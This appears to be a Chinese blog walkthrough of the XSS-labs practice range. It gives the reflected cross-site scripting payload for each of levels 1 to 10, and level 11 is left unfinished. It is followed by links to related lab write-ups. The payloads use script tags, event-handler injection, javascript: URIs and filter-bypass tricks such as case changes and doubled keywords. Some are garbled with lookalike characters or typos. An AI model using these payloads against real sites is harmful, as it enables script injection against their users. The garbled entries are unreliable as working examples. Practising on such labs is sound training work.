Level 1

Palyload：name=<script>alert(/test/)</script>

Level 2

Playload：keyword="><script>alert(/xss/)</script><"

Level 3

Palyload：keyword=' οnmοuseοver=’alert(/xss/)’

Level 4

Palyload：keyword=" οnmοuseοver='alert(/xss/)'

Level 5

Playload：“><a href=”javascript:alert:alert(/xss/)”>click</a>

Level 6

Playload：keyword=" ONmouseover='alert(/xss/)'

Level 7

Playload：keyword=" oonnmouseover='alert(/xss/)'

Playlaod：keyword="><a hhrefref="javascscriptript:alert(/xss/)">click</a>

Level 8

Playload：keyword=javascript:alert(/xss/)

Playload：keyword=javascript:alert(/xss/) html实体编码绕过

Level 9

Playload：keyword=javascript:alert('http://www.baidu.com')

Level 10

Playload：t_sort=" type="botton" οnmοuseοver='alert(/xss/)'

t_sort=click" type="button" οnclick="alert(/xss/)"

查看源码：

测试发现：

结果：

Level 11

Playload：

稍等，测试中。。。

XSS-labs通关游戏相关推荐

python是一门面向什么的语言用词语填空_使用pygame写一个古诗词填空通关游戏
之前写的诗词填空的游戏支持python2,现在对程序进行了修改,兼容支持python2和python3,附下效果图. 下面是两个主程序 idiom_lib.py代码: # -*- coding=utf ...
XSS Game通关教程
12.XSS Game通关教程 1.Ma Spaghet! 审查源码一个不安全的方式,直接get传输somebody 输入123看看位置 ?somebody=123 如下用下input标签即可 & ...
优秀课程案例：使用Scratch制作超级玛丽通关游戏
点击上面微信号关注我关注我哟每天坚持推送文章,争取做到日更,喜欢的可以设置星标,并分享点赞我们的文章,非常感谢大家的支持,您的点击的在看就是我们的动力! 我们先来看一下超级玛丽通关游戏的效果,大家顺手 ...
黑客之XSS注入练手：XSS Challenges通关指南
本文目录: [TOC] 一.XSS Challenges介绍靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 ...
给游戏编个故事:《通关游戏设计之道》
给游戏编个故事要让故事服从游戏性,而不是故事全部定义好然后添加穿插游戏性因素到故事中. 一般游戏的结局在开始几乎都能够让玩家猜到,但是重要的是游戏故事细节对于整个情节的丰满,这些细节才是打动玩家的重 ...
xss labs 挑战之旅
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一关,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及conf ...
基于Python的Flask框架实现的寻宝通关游戏课程论文+项目源码
资源下载地址:https://download.csdn.net/download/sheziqiong/85705658 资源下载地址:https://download.csdn.net/downl ...
pygame做一个古诗词填空通关游戏
之前写的诗词填空的游戏支持python2,现在对程序进行了修改,兼容支持python2和python3,附下效果图. 下面是两个主程序 idiom_lib.py代码: # -*- coding=utf ...
sql—labs通关
本文使用的工具有Navicat,phpstrom,小皮面板,至于安装方法这里不再描述可以,哔哩哔哩搜索一下即可 sqllabs下载地址:https://github.com/Audi-1/sqli-l ...

XSS-labs通关游戏